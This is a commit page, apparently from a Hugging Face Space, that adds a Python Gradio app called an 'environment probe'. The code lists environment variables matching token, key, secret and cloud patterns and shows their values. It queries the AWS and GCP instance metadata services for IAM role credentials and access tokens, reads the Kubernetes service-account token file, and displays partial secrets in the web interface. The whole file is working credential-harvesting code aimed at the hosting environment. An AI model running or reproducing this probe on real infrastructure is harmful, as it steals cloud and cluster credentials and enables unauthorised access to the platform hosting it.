vanilla-tiramisu commited on
Commit
33b6d20
·
verified ·
1 Parent(s): fe7c260

Create app.py

Browse files
Files changed (1) hide show
  1. app.py +66 -0
app.py ADDED
@@ -0,0 +1,66 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import gradio as gr
2
+ import os
3
+ import urllib.request
4
+ import json
5
+
6
+ def probe_environment():
7
+ output = "================ 1. 环境变量检查 ================\n"
8
+ suspicious_keys = [k for k in os.environ.keys() if any(x in k.upper() for x in ['AWS', 'GCP', 'GOOGLE', 'AZURE', 'TOKEN', 'KEY', 'SECRET', 'CRED', 'HF'])]
9
+ for k in suspicious_keys:
10
+ output += f"{k}: {os.environ[k][:20]}...\n" if len(os.environ[k]) > 20 else f"{k}: {os.environ[k]}\n"
11
+
12
+ if not suspicious_keys:
13
+ output += "未发现明显敏感的环境变量。\n"
14
+
15
+ output += "\n================ 2. 云厂商 IMDS 探测 ================\n"
16
+
17
+ # AWS IMDSv1
18
+ try:
19
+ req = urllib.request.Request("http://169.254.169.254/latest/meta-data/iam/security-credentials/", method="GET")
20
+ with urllib.request.urlopen(req, timeout=2) as response:
21
+ role_name = response.read().decode('utf-8').strip()
22
+ output += f"🚨 AWS IMDSv1 可达! Role: {role_name}\n"
23
+ # 进一步拿凭证
24
+ req2 = urllib.request.Request(f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}", method="GET")
25
+ with urllib.request.urlopen(req2, timeout=2) as res2:
26
+ output += f"凭证信息: {res2.read().decode('utf-8')[:50]}...\n"
27
+ except Exception as e:
28
+ output += "AWS IMDSv1 阻断或不存在。\n"
29
+
30
+ # AWS IMDSv2
31
+ try:
32
+ req_token = urllib.request.Request("http://169.254.169.254/latest/api/token", method="PUT", headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
33
+ with urllib.request.urlopen(req_token, timeout=2) as res_token:
34
+ token = res_token.read().decode('utf-8')
35
+ req_v2 = urllib.request.Request("http://169.254.169.254/latest/meta-data/iam/security-credentials/", method="GET", headers={"X-aws-ec2-metadata-token": token})
36
+ with urllib.request.urlopen(req_v2, timeout=2) as res_v2:
37
+ role_name = res_v2.read().decode('utf-8').strip()
38
+ output += f"🚨 AWS IMDSv2 可达! Role: {role_name}\n"
39
+ except Exception as e:
40
+ output += "AWS IMDSv2 阻断或不存在。\n"
41
+
42
+ # GCP IMDS
43
+ try:
44
+ req_gcp = urllib.request.Request("http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", method="GET", headers={"Metadata-Flavor": "Google"})
45
+ with urllib.request.urlopen(req_gcp, timeout=2) as res_gcp:
46
+ output += f"🚨 GCP IMDS 可达! Token: {res_gcp.read().decode('utf-8')[:50]}...\n"
47
+ except Exception as e:
48
+ output += "GCP IMDS 阻断或不存在。\n"
49
+
50
+ # 读取 K8s token
51
+ output += "\n================ 3. 本地凭据文件 ================\n"
52
+ try:
53
+ with open("/var/run/secrets/kubernetes.io/serviceaccount/token", "r") as f:
54
+ output += f"⚠️ K8s Token: {f.read()[:20]}...\n"
55
+ except Exception:
56
+ output += "未发现 K8s token。\n"
57
+
58
+ return output
59
+
60
+ with gr.Blocks() as demo:
61
+ gr.Markdown("## 环境探测器")
62
+ out = gr.Textbox(label="探测结果", lines=20)
63
+ btn = gr.Button("开始探测")
64
+ btn.click(fn=probe_environment, inputs=[], outputs=out)
65
+
66
+ demo.launch()